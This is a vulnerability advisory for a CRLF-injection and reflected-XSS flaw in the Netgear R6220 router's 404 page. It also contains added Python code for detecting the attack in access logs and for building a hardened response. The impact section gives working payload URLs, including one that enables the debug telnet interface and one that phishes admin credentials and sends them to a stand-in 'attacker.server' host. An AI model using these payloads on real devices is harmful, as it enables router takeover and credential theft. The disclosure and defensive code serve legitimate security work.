NETGEAR/CVE-2022-47052/
Response Splitting via CRLF

Description

CRLF (Carriage Return Line Feed) Injection CWE-93: https://cwe.mitre.org/data/definitions/93.html

Response splitting via Carriage Return Line Feed (CRLF) is a vulnerability that exploits the way HTTP parses the line-terminator characters \r and \n in headers. Appending these characters to HTTP headers can allow the insertion of payloads into a header, which can result in the manipulation of cookies, server information, and status codes.

Type: Unauthenticated Remote attack

Tested on firmware version: V1.1.0.112_1.0.1, V1.1.0.114_1.0.1

Details

The web interface of the 'Nighthawk R6220 AC1200 Smart Wi-Fi Router' is vulnerable to a CRLF Injection attack that can be leveraged to perform Reflected XSS and HTML Injection.

This issue affects the custom 404 page that is served when a request is issued for a page that does not exist. By leveraging this vulnerability, an unauthenticated remote attacker is able to inject arbitrary HTML and JavaScript code to be executed in a user's browser.

Impact

A malicious attacker can exploit this vulnerability using a specially crafted URL. If this URL is opened by an administrator, the attacker can achieve the following:

  1. Perform actions on the administrative portion of the web application
  • Example payload that enables the debug telnet interface: https://192.168.1.1/666%0A%0A%3Cscript%3Edocument.location=%22https://192.168.1.1/setup.cgi?todo=debug%22;%3C/script%3E
  2. Obtain the administrator's credentials through phishing
  • Example phishing payload: https://192.168.1.1/123%0A%0A%3Cscript>var name=prompt("Username");var pass=prompt("Password");document.location="http://attacker.server/?user="+name+"?pass="+pass;</script>

Note that if another vulnerability is present in the administrative portal, such as a Remote Command Execution (RCE), an attacker can use a specially crafted URL to chain the two vulnerabilities into a one-click exploit.

Evidence

The request consists of a resource that does not exist ("xsstesty") followed by Line-Feed characters (%0A%0A) and the JavaScript payload.

Request

GET /xsstesty%0A%0A%3Cscript%3Ealert('xss');%3C/script%3E 
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionid=sid17289xxx158005xxx1087458037
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

Note that the HTTP response headers are embedded directly into the 404 page response body and the payload is executed on the victim's browser.

Response Body

<script>alert('xss');</script> HTTP/1.1 404 Not Found
Server: 
Date: Fri, 02 Jan 1970 02:44:27 GMT
Content-Type: text/html
P3P: 443
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1;mode=block
X-Content-Type-Options: nosniff
Connection: close

        <HTML>
        <HEAD><TITLE>404 Not Found</TITLE></HEAD>
        <BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
        <H4>404 Not Found</H4>
File not found.
</BODY>
</HTML>
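The evidence above is visible in web-server access logs as a request target carrying percent-encoded line terminators before the payload. The following detection check is an added example, not part of this advisory: it parses Common Log Format lines (a constructed sample; the client addresses, timestamps and sizes are placeholders) and flags every request whose URL-decoded target contains a carriage return or line feed, including double-encoded forms such as %250A.

```python
"""Detection check for CRLF-injection attempts in request paths.

Added example, not part of the original advisory. It parses access-log
lines in Common Log Format (a constructed sample below, not logs from the
advisory) and flags every request whose URL-decoded target contains a
carriage return or line feed, the pattern of the advisory's evidence
request (%0A%0A placed before the <script> payload).
"""
import re
from urllib.parse import unquote

# Constructed sample log; client addresses, timestamps and sizes are placeholders.
SAMPLE_LOG = """\
192.168.1.50 - - [02/Jan/1970:02:44:20 +0000] "GET /index.htm HTTP/1.1" 200 5120
192.168.1.50 - - [02/Jan/1970:02:44:27 +0000] "GET /xsstesty%0A%0A%3Cscript%3Ealert('xss');%3C/script%3E HTTP/1.1" 404 312
192.168.1.77 - - [02/Jan/1970:02:45:01 +0000] "GET /images/logo.png HTTP/1.1" 200 2048
192.168.1.50 - - [02/Jan/1970:02:46:10 +0000] "GET /666%250D%250A%250D%250A%3Cscript%3E HTTP/1.1" 404 300
192.168.1.51 - - [02/Jan/1970:02:47:00 +0000] "GET /setup.cgi?todo=debug HTTP/1.1" 200 100
"""

# Common Log Format: host ident authuser [date] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)


def decoded_target(target: str) -> str:
    """Percent-decode the request target twice: one pass mirrors what the
    server does before routing, the second catches double-encoded %250A."""
    return unquote(unquote(target))


def has_crlf(target: str) -> bool:
    """True if the decoded request target contains CR or LF."""
    decoded = decoded_target(target)
    return "\r" in decoded or "\n" in decoded


def scan_log(text: str) -> list[dict]:
    """Return one record per logged request whose target carries CR/LF."""
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if m is None:
            continue  # not a CLF line; skip rather than guess at its fields
        if has_crlf(m["target"]):
            hits.append({
                "ip": m["ip"],
                "time": m["time"],
                "target": m["target"],
                "status": m["status"],
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['status']} {hit['target']}")
```

Run against the sample, the scan reports the two 404 requests with line terminators in the path and ignores the normal page and image requests. The second decoding pass is deliberate: a target that only becomes CR/LF after two decodes is still worth reviewing, and in a detection context a false positive on an oddly encoded legitimate path costs far less than a miss.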

Remediation

Sanitize and neutralize all user-supplied data, or properly encode output, in HTTP headers that would otherwise be visible to users, in order to prevent the injection of CRLF sequences and their consequences.
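The following is an added example for the description and remediation above; it is not the router's code. It builds a custom 404 response two ways, under the assumption (not stated in the advisory) that the handler reflects the requested path into a header named X-Requested-Path (a hypothetical header chosen only for illustration) and into the page body. The vulnerable builder reflects the raw path, so a target containing %0A%0A ends the header block early and the rest of the path becomes the start of the body, which is the response-splitting effect shown in the evidence section. The hardened builder neutralises CR/LF before the value reaches a header and HTML-encodes it before it reaches the body.

```python
"""Added example for the remediation above; it is not the router's code.

Builds the custom 404 response two ways, assuming (not stated in the
advisory) that the handler reflects the requested path into a header and
into the page body. The vulnerable builder reflects the raw path; the
hardened builder neutralises CR/LF for the header and HTML-encodes for
the body.
"""
import re
from html import escape
from urllib.parse import unquote

# Hypothetical header name used only to illustrate reflection into a header.
REFLECT_HEADER = "X-Requested-Path"


def neutralize_header_value(value: str) -> str:
    """Keep only printable ASCII; drops CR, LF and other control characters
    that must never appear in an HTTP header field value."""
    return "".join(ch for ch in value if " " <= ch <= "~")


def build_404_vulnerable(raw_target: str) -> bytes:
    """Reflects the decoded path unmodified into a header and the body."""
    path = unquote(raw_target)
    head = (
        "HTTP/1.1 404 Not Found\r\n"
        "Content-Type: text/html\r\n"
        f"{REFLECT_HEADER}: {path}\r\n"
        "\r\n"
    )
    body = f"<html><body><h4>404 Not Found</h4>File not found: {path}</body></html>"
    return (head + body).encode()


def build_404_hardened(raw_target: str) -> bytes:
    """Same response, with header-safe and HTML-safe versions of the path."""
    path = unquote(raw_target)
    head = (
        "HTTP/1.1 404 Not Found\r\n"
        "Content-Type: text/html\r\n"
        f"{REFLECT_HEADER}: {neutralize_header_value(path)}\r\n"
        "\r\n"
    )
    body = (
        "<html><body><h4>404 Not Found</h4>"
        f"File not found: {escape(path, quote=True)}</body></html>"
    )
    return (head + body).encode()


def split_response(response: bytes) -> tuple[list[str], bytes]:
    """Split at the first blank line, accepting bare LF as browsers do."""
    parts = re.split(rb"\r?\n\r?\n", response, maxsplit=1)
    head = parts[0].decode("latin-1")
    body = parts[1] if len(parts) > 1 else b""
    return re.split(r"\r?\n", head), body


def body_is_intact(response: bytes) -> bool:
    """True if the body starts with the document the handler meant to send."""
    _, body = split_response(response)
    return body.startswith(b"<html>")


if __name__ == "__main__":
    # Constructed target modelled on the evidence request above.
    target = "/666%0A%0A%3Cscript%3Ealert('xss');%3C/script%3E"
    for builder in (build_404_vulnerable, build_404_hardened):
        print(builder.__name__, "body intact:", body_is_intact(builder(target)))
```

The check in split_response deliberately treats a bare LF as a line break, because browsers do; a test that only looks for \r\n\r\n would report the vulnerable response as intact even though the advisory's evidence uses bare %0A%0A. Two different transformations are applied on purpose: control characters are stripped for the header (HTML-encoding a header value would not stop it from terminating the line), while the body gets HTML-encoding so the path is displayed rather than interpreted. Because the header filter runs on the final decoded value, it holds no matter how many decoding passes the server performed beforehand.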